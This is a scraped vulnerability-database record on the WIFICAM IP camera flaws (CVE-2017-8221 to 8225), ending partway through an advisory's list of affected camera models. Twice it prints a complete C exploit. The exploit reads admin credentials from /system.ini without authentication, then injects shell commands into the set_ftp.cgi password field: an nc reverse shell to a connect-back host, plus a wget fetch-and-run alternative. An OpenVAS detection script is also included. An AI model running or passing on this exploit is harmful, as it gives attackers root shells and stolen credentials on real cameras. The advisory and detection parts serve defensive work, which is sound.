{"id": "EDB-ID:43142", "hash": "8461a0c3eee8e49fa30f9a1137529c32", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution", "description": "Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution. CVE-2017-8221,CVE-2017-8222,CVE-2017-8223,CVE-2017-8224,CVE-2017-8225. Remote explo...", "published": "2017-03-08T00:00:00", "modified": "2017-03-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/43142/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-8221", "CVE-2017-8222", "CVE-2017-8224", "CVE-2017-8223", "CVE-2017-8225"], "lastseen": "2017-11-14T16:32:36", "history": [], "viewCount": 39, "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [{"type": "seebug", "idList": ["SSV:92748"]}, {"type": "zdt", "idList": ["1337DAY-ID-29003"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106636"]}, {"type": "cve", "idList": ["CVE-2017-8224", "CVE-2017-8222", "CVE-2017-8223", "CVE-2017-8221", "CVE-2017-8225"]}, {"type": "threatpost", "idList": ["THREATPOST:31CC1BF1652AEA543504AB09594E8DAB", "THREATPOST:D2E45A61AF79D195D55671053FCCC5BA"]}, {"type": "thn", "idList": ["THN:F659F177E9871AC527A9D7C561D7ABDF"]}, {"type": "nessus", "idList": ["GOAHEAD_PASSWORD_LEAK.NASL"]}], "modified": "2017-11-14T16:32:36"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/43142/", "sourceData": "# Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c\r\n# Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n\r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\n\r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\nchar * creds(char *argv,\r\n int get_config);\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n\r\n\r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n\r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n\r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n\r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n \r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n\r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n\r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n\r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n\r\n return (0);\r\n}\r\n\r\n\r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n\r\n\r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n\r\n printf(\"[+] bypassing auth ... \");\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n\r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n\r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n\r\n close(sock);\r\n\r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n\r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n\r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n\r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n\r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n\r\n\r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n\r\n return (out);\r\n }\r\n }\r\n }\r\n\r\n free(tmp);\r\n\r\n return (NULL);\r\n}\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n\r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n\r\n sock = 0;\r\n\r\n printf(\"[+] %s payload ... \", desc);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n\r\n\r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n\r\n return (0);\r\n}", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"openvas": [{"lastseen": "2019-03-08T14:03:10", "bulletinFamily": "scanner", "description": "The IP-Camera is prone to multiple vulnerabilities.\n\n This vulnerability was known to be exploited by the IoT Botnet ", "modified": "2019-03-08T00:00:00", "published": "2017-03-08T00:00:00", "id": "OPENVAS:1361412562310106636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106636", "title": "Multiple IP-Cameras (P2P) WIFICAM Cameras Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mult_ip_cameras_mult_vuln.nasl 14045 2019-03-08 07:18:46Z cfischer $\n#\n# Multiple IP-Cameras (P2P) WIFICAM Cameras Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106636\");\n script_version(\"$Revision: 14045 $\");\n script_cve_id(\"CVE-2017-8224\", \"CVE-2017-8222\", \"CVE-2017-8225\", \"CVE-2017-8223\", \"CVE-2017-8221\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 08:18:46 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:16:59 +0700 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_name(\"Multiple IP-Cameras (P2P) WIFICAM Cameras Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 81);\n script_mandatory_keys(\"GoAhead-Webs/banner\");\n\n script_tag(name:\"summary\", value:\"The IP-Camera is prone to multiple vulnerabilities.\n\n This vulnerability was known to be exploited by the IoT Botnet 'Reaper' in 2017.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP request to read the system configuration and checks\n the response.\");\n\n script_tag(name:\"insight\", value:\"Multiple IP-Cameras are prone to multiple vulnerabilities:\n\n - Backdoor account\n\n - RSA key and certificates\n\n - Pre-Auth Info Leak (credentials) within the GoAhead http server\n\n - Authenticated RCE as root\n\n - Pre-Auth RCE as root\n\n - Streaming without authentication\n\n - Unsecure Cloud functionality\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute arbitrary code and read arbitrary\n files.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_xref(name:\"URL\", value:\"https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html\");\n script_xref(name:\"URL\", value:\"https://blogs.securiteam.com/index.php/archives/3043\");\n script_xref(name:\"URL\", value:\"http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/\");\n\n exit(0);\n}\n\ninclude(\"dump.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default: 81);\n\nurl = \"/system.ini?loginuse&loginpas\";\n\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\ntmp = bin2string(ddata: res, noprint_replacement: \" \");\nif (strlen(res) > 4000 && (egrep(pattern: \"([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})\", string: tmp) ||\n \"IPCAM\" >< res || \"admin\" >< res)) {\n if (http_vuln_check(port: port, url: \"login.cgi\", pattern: 'var loginpass=\".*\";', check_header: TRUE)) {\n report = report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-05T21:33:08", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2017-11-15T00:00:00", "published": "2017-11-15T00:00:00", "href": "https://0day.today/exploit/description/29003", "id": "1337DAY-ID-29003", "type": "zdt", "title": "WIFICAM Wireless IP Camera (P2P) - Unauthenticated Remote Code Execution Exploit", "sourceData": "#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n \r\n \r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n \r\n \r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n \r\nchar * creds(char *argv,\r\n int get_config);\r\n \r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n \r\n \r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n \r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n \r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n \r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n \r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n \r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n \r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n \r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n \r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n \r\n return (0);\r\n}\r\n \r\n \r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n \r\n \r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n \r\n printf(\"[+] bypassing auth ... \");\r\n \r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n \r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n \r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n \r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n \r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n \r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n \r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n \r\n close(sock);\r\n \r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n \r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n \r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n \r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n \r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n \r\n \r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n \r\n return (out);\r\n }\r\n }\r\n }\r\n \r\n free(tmp);\r\n \r\n return (NULL);\r\n}\r\n \r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n \r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n \r\n sock = 0;\r\n \r\n printf(\"[+] %s payload ... \", desc);\r\n \r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n \r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n \r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n \r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n \r\n \r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n \r\n return (0);\r\n}\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/29003", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:01:14", "bulletinFamily": "exploit", "description": "## Product Description\r\n\r\nThe Wireless IP Camera (P2P) WIFICAM is a Chinese web camera which allows to stream remotely.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Wireless IP Camera (P2) WIFICAM is a camera overall badly designed with a lot of vulnerabilities. This camera is very similar to a lot of other Chinese cameras.\r\n\r\nIt seems that a generic camera is being sold by a Chinese company in bulk (OEM) and the buyer companies resell them with custom software development and specific branding. Wireless IP Camera (P2) WIFICAM is one of the branded cameras.\r\n\r\nSo, cameras are sold under different names, brands and functions. The HTTP interface is different for each vendor but shares the same vulnerabilities.\r\n\r\nBecause of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE), **which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability**.\r\n\r\nThe summary of the vulnerabilities is:\r\n\r\n1. [CVE-2017-8224 - Backdoor account](#backdoor-account)\r\n2. [CVE-2017-8222 - RSA key and certificates](#rsa-lulz)\r\n3. [CVE-2017-8225 - Pre-Auth Info Leak (credentials) within the custom http server](#pre-auth-info-leak-goahead)\r\n4. [Authenticated RCE as root](#root-rce)\r\n5. [Pre-Auth RCE as root](#pre-auth-root-rce)\r\n6. [CVE-2017-8223 - Misc - Streaming without authentication](#open-streaming)\r\n7. [CVE-2017-8221 - Misc - \"Cloud\" (Aka Botnet)](#cloud)\r\n\r\n**The vulnerabilities in the Cloud management affect a lot of P2P or \"Cloud\" cameras.**\r\n\r\n**My tests have shown that the InfoLeak affecting the GoAhead server running on the camera affects at least 1250+ camera models. It can be used to execute the RCE as root. Thus, these cameras are likely affected by a pre-auth RCE as root:**\r\n\r\n```\r\n3G+IPCam Other\r\n3SVISION Other\r\n3com CASA\r\n3com Other\r\n3xLogic Other\r\n3xLogic Radio\r\n4UCAM Other\r\n4XEM Other\r\n555 Other\r\n7Links 3677\r\n7Links 3677-675\r\n7Links 3720-675\r\n7Links 3720-919\r\n7Links IP-Cam-in\r\n7Links IP-Wi-Fi\r\n7Links IPC-760HD\r\n7Links IPC-770HD\r\n7Links Incam\r\n7Links Other\r\n7Links PX-3615-675\r\n7Links PX-3671-675\r\n7Links PX-3720-675\r\n7Links PX3309\r\n7Links PX3615\r\n7Links ipc-720\r\n7Links px-3675\r\n7Links px-3719-675\r\n7Links px-3720-675\r\nA4Tech Other\r\nABS Other\r\nADT RC8021W\r\nAGUILERA AQUILERA\r\nAJT AJT-019129-BBCEF\r\nALinking ALC\r\nALinking Other\r\nALinking dax\r\nAMC Other\r\nANRAN ip180\r\nAPKLINK Other\r\nAQUILA AV-IPE03\r\nAQUILA AV-IPE04\r\nAVACOM 5060\r\nAVACOM 5980\r\nAVACOM H5060W\r\nAVACOM NEW\r\nAVACOM Other\r\nAVACOM h5060w\r\nAVACOM h5080w\r\nAcromedia IN-010\r\nAcromedia Other\r\nAdvance Other\r\nAdvanced+home lc-1140\r\nAeoss J6358\r\nAetos 400w\r\nAgasio A500W\r\nAgasio A502W\r\nAgasio A512\r\nAgasio A533W\r\nAgasio A602W\r\nAgasio A603W\r\nAgasio Other\r\nAirLink Other\r\nAirmobi HSC321\r\nAirsight Other\r\nAirsight X10\r\nAirsight X34A\r\nAirsight X36A\r\nAirsight XC39A\r\nAirsight XX34A\r\nAirsight XX36A\r\nAirsight XX40A\r\nAirsight XX60A\r\nAirsight x10\r\nAirsight x10Airsight\r\nAirsight xc36a\r\nAirsight xc49a\r\nAirsight xx39A\r\nAirsight xx40a\r\nAirsight xx49a\r\nAirsight xx51A\r\nAirsight xx51a\r\nAirsight xx52a\r\nAirsight xx59a\r\nAirsight xx60a\r\nAkai AK7400\r\nAkai SP-T03WP\r\nAlecto 150\r\nAlecto Atheros\r\nAlecto DVC-125IP\r\nAlecto DVC-150-IP\r\nAlecto DVC-1601\r\nAlecto DVC-215IP\r\nAlecto DVC-255-IP\r\nAlecto dv150\r\nAlecto dvc-150ip\r\nAlfa 0002HD\r\nAlfa Other\r\nAllnet 2213\r\nAllnet ALL2212\r\nAllnet ALL2213\r\nAmovision Other\r\nAndroid+IP+cam IPwebcam\r\nAnjiel ip-sd-sh13d\r\nApexis AH9063CW\r\nApexis APM-H803-WS\r\nApexis APM-H804-WS\r\nApexis APM-J011\r\nApexis APM-J011-Richard\r\nApexis APM-J011-WS\r\nApexis APM-J012\r\nApexis APM-J012-WS\r\nApexis APM-J0233\r\nApexis APM-J8015-WS\r\nApexis GENERIC\r\nApexis H\r\nApexis HD\r\nApexis J\r\nApexis Other\r\nApexis PIPCAM8\r\nApexis Pyle\r\nApexis XF-IP49\r\nApexis apexis\r\nApexis apm-\r\nApexis dealextreme\r\nAquila+Vizion Other\r\nArea51 Other\r\nArmorView Other\r\nAsagio A622W\r\nAsagio Other\r\nAsgari 720U\r\nAsgari Other\r\nAsgari PTG2\r\nAsgari UIR-G2\r\nAtheros ar9285\r\nAvantGarde SUMPPLE\r\nAxis 1054\r\nAxis 241S\r\nB-Qtech Other\r\nB-Series B-1\r\nBRAUN HD-560\r\nBRAUN HD505\r\nBeaulieu Other\r\nBionics Other\r\nBionics ROBOCAM\r\nBionics Robocam\r\nBionics T6892WP\r\nBionics t6892wp\r\nBlack+Label B2601\r\nBravolink Other\r\nBreno Other\r\nCDR+king APM-J011-WS\r\nCDR+king Other\r\nCDR+king SEC-015-C\r\nCDR+king SEC-016-NE\r\nCDR+king SEC-028-NE\r\nCDR+king SEC-029-NE\r\nCDR+king SEC-039-NE\r\nCDR+king sec-016-ne\r\nCDXX Other\r\nCDXXcamera Any\r\nCP+PLUS CP-EPK-HC10L1\r\nCPTCAM Other\r\nCamscam JWEV-372869-BCBAB\r\nCasa Other\r\nCengiz Other\r\nChinavasion Gunnie\r\nChinavasion H30\r\nChinavasion IP611W\r\nChinavasion Other\r\nChinavasion ip609aw\r\nChinavasion ip611w\r\nCloud MV1\r\nCloud Other\r\nCnM IP103\r\nCnM Other\r\nCnM sec-ip-cam\r\nCompro NC150/420/500\r\nComtac CS2\r\nComtac CS9267\r\nConceptronic CIPCAM720PTIWL\r\nConceptronic cipcamptiwl\r\nCybernova Other\r\nCybernova WIP604\r\nCybernova WIP604MW\r\nD-Link DCS-910\r\nD-Link DCS-930L\r\nD-Link L-series\r\nD-Link Other\r\nDB+Power 